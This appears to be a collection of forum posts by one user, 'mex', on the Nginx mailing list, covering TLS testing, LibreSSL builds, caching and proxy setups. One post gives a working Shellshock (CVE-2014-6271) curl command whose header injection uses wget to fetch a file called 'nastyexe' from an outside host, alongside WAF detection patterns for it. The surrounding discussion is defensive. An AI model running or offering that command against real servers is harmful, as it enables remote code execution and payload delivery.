it is more a performance issue than a security issue (disk space, i/o, buffering) etc.
by mex - Nginx Mailing List - English
did you try server_name _; already? did you chain the certs for a.com / c.com in the correct order? see http://nginx.org/en/docs/http/configuring_https_servers.html / An SSL certificate with several names
i don't know of an out-of-the-box solution, but this might point in the right direction:
- https://github.com/yaoweibin/nginx_tcp_proxy_module
- http://stackoverflow.com/questions/5337122/is-it-possible-to-forward-non-http-connecting-request-to-some-other-port-in-ngin
cheers, mex
btw, it seems impossible to have ... ssl_protocols TLSv1.2; ... and a test result of SSLv2 NOT offered (ok) SSLv3 offered TLSv1 not offered TLSv1.1 not offered TLSv1.2 not offered. are you sure you have tested the right machine? i'd suggest you run the testssl.sh script against https://localhost:443 on the machine where you built nginx. iirc, openssl 1.0.1e should be able
this probably depends on the underlying openssl version from your os. what does 'openssl version' say? if you want nginx with a newer openssl version you can build a custom nginx with openssl statically linked: https://www.mare-system.de/guide-to-nginx-ssl-spdy-hsts/#workaround-for-outdated-openssl-versions regards, mex
curl -k -H 'User-Agent: () { somedummytext; }; /usr/bin/wget -O /tmp/nastyexe http://myserver.com/nastyexe' https://target.com/cgi-bin/hi :D if, you should try to match for (regex-pattern) "\(\) {" #since this must be written like this; an additional space between "() {" would render the exploit non-functional. furthermore: you are missing all headers; attac
hi pekka, since the attack, esp. against CGI, is possible through (custom) headers/cookies etc., you'd need some waf functionality (afaik). naxsi, an nginx-based waf, has had a signature for this since wednesday: MainRule "str:() {" "msg:Possible Remote code execution through Bash CVE-2014-6271" "mz:BODY|HEADERS" "s:$ATTACK:8" id:42000393 ; ht
foo ... http://www.openwall.com/lists/oss-security/2014/09/24/17 "Note that on Linux systems where /bin/sh is symlinked to /bin/bash, any popen() / system() calls from within languages such as PHP would be of concern due to the ability to control HTTP_* in the env. /mz"
$ ls -la /bin/sh
lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash
phew ':)
hi list, the following bug (Remote code execution through bash) http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/ **might** affect you if you use a shell/bash-based fcgi wrapper like in the following recipe: http://wiki.nginx.org/Fcgiwrap / http://wiki.nginx.org/FcgiwrapDebianInitScript (did not test it); if someone runs a shell-based cgi
can you post your config please? besides this, is there a reason you stick to the AJP connector? iirc this is not a default module for nginx, and in my testing i found the HTTP connector as fast as AJP, but working kind of smoother for tomcat appservers. regards, mex
Piotr Sikora Wrote:
> Hey,
>
> > # Summary
> >
> > It works.
>
> ....only with versions older than nginx-1.7.0, you need a small patch (attached) in order to compile nginx-mainline against LibreSSL, because LibreSSL developers decided that LibreSSL is OpenSSL-2.0.0... I didn't send thi
updated: static version and new perftests included https://www.mare-system.de/blog/page/1405201517/ regards, mex
> Just a quick comment: OpenSSL's libs under ".openssl/" isn't a result of OpenSSL's behaviour, but rather a result of "make install" nginx calls (and the ".openssl" install prefix it instructs OpenSSL to use).

maybe we can have a --with-libressl=/path/to/libressl or something more generic soon? i think libressl/boringssl ar
> I think the cleanest solution would be if the backend could receive 1 request and just split the content/response into chunks and send what's immediately available (html head + perhaps page header as well) as first chunk and send the rest afterwards.

sounds tricky ... i must admit, i am not **that** deep into nginx internals to say if nginx does this already
> Ok, I haven't done anything with nginx+lua so far, need to check out what can be done with lua. Can you give some direction how lua can be helpful here?

oh ... lua might be used to manipulate every single phase of a request coming to and processed by nginx; so a swiss army knife super-extended version :) some stuff to skim through to get an impression: - https:/
sounds more like a custom solution that might be achieved using lua + nginx; from what i understand you have a "static" part that should get sent early/from cache and a "dynamic" part that must wait for the backend? the only solution i could think of for such an asynchronous delivery is using nginx + lua, or maybe varnish (iirc you could mark parts of a page cacheabl
https://www.mare-system.de/blog/page/1405201517/
# Summary
It works. While it is not recommended to substitute OpenSSL with LibreSSL in this early stage, i wanted to test if it is possible. And it is. There are no functional or performance issues, as far as i can test, and building nginx + libressl is easy, once you have figured out how to do it. The advantages of using LibreSSL in the long ru
according to w3techs, nginx is now #1 on the top 1000 list of websites, and according to some perftests we did on our side, 1.6.0 seems to be 10% faster than 1.4; WELL DONE, nginx-team, and thanx for all the support http://w3techs.com/technologies/cross/web_server/ranking lyrics somewhat unrelated, but i found the dancing part amusing :D https://www.youtube.com/watch?v=7xO-yEaiFoQ
depending on your setup you might think about serving static content and videos directly from nginx: http://www.nginxtips.com/optimizing-nginx-for-video-sites/ anything served directly from nginx, not going to apache, will boost your performance.

> Mex, That's a high amount of reduction in load-avg then :). Could you please refer me to some guide to start with nginx-cache?
if the content is cacheable, using varnish or nginx-cache will definitely reduce load. we have a similar setup (nginx in front of apache+php) with an average of 5000 requests/second, and using nginx-cache with a cache time of 1 minute reduced load from around 8 to 0.5 on the apache servers, while the nginx servers are still idling at around 0.2. we use nginx to cache static content as w
if your site is silviosiefke.com, there is no tls service available on port 443. can you please paste the output of nginx -t / nginx -V ?
########################################################
testssl.sh v2.0rc2 (https://testssl.sh)
########################################################
Using "OpenSSL 1.0.1g 7 Apr 2014" on
On port 443 @ silviosiefke.com seems a
maybe you should capture the traffic with wireshark to see which party sends what packet in which order. regards, mex
> Hence I have to place nginx before apache without disturbing the setup.

works seamlessly and speeds up your apache when using proxy_cache. assuming your apache listens on 8080:

server {
    listen 80;
    server_name myhost;
    location / {
        root /path/to/myapp/public;
        proxy_set_header X-Forwarded-Host $host;
        proxy_set_header X-Forwarded-Server $host;
> Can anyone tell me what the benefits are (apart from .htaccess support, which I see all too often as a curse) why anyone would do this in preference to just using a pure nginx solution?

- out-of-the-box running stuff like mod_php / suphp
- excessive use of rewrite rules in .htaccess to make urls look REST-like (typo3)
- well tested environments
you should make your apache listen on 127.0.0.1:80 and nginx on your external IP:80 (443 if you need ssl). did you check the manuals in the wiki?
http://wiki.nginx.org/Configuration -> proxying examples
http://wiki.nginx.org/LikeApache -> all you need for a start
after this you should check proxy_cache and different location {} setups for your static files.
hi, what is your os (name and version)? where do you have the ciphers from btw? i'd suggest you test the tls version yourself with testssl.sh https://bitbucket.org/nginx-goodies/testssl.sh (note: you need a current openssl version on the machine you test from) regards, mex
hi robert, if you don't depend on mod_security's advanced features like output-filtering'n'stuff you might want to try naxsi https://github.com/nbs-system/naxsi/wiki it's stable, it's fast, rules are easy to create and understand and it provides a set of basic features for a waf. the community is responsive and open for feature requests or bug reports. regards, mex
i've seen the question below on nginx-dev from september last year, http://forum.nginx.org/read.php?29,243031,243031#msg-243031 I've seen some attempts to use polarssl one year ago and would like to restart development in that direction, so i'd like to re-issue this question from Aleksandar Lazic:

Are there any plans to add another S
do you have try_files enabled? i'd try this to check if the request reaches the right location block:

location ^~ /card/ {
    ...
    access_log /var/log/nginx/cards.log combined;
    ...
}

if so, you must look inside your location; if not, somewhere else. regards, mex